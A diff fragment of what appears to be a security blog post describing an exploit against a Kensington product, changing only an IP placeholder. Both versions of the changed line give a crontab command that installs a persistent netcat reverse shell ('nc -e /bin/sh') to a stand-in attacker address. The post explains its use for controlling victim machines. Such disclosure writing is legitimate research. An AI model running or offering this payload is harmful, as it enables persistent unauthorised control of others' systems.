robert/robert.github.com/_posts/2100-01-01-kensington.md

 1. Use the "paste" command to paste and execute my payload bash command
 1. Use the "quit" command to exit the terminal and clean up after myself

-My payload bash command would be something like `crontab -l | { cat; echo "*/5 * * * * nc -e /bin/sh MY.IP.ADDR.ESS 1234"; } | crontab -`.
+My payload bash command would be something like `crontab -l | { cat; echo "*/5 * * * * nc -e /bin/sh ATTACKER.IP.ADDR.ESS 1234"; } | crontab -`.
 This command creates a cron job that connects back to my machine every 5 minutes, giving me a persistent *reverse shell* that I can use to control the victim's machine.
 After establishing a connection I could sniff around on the target machine, try to escalate to root privileges, or simply add the machine to a botnet.

 I wrote a library (not shown in this post so as to make a would-be attacker's life at least slightly challenging) that allowed me to write exploit JavaScript that looked like this: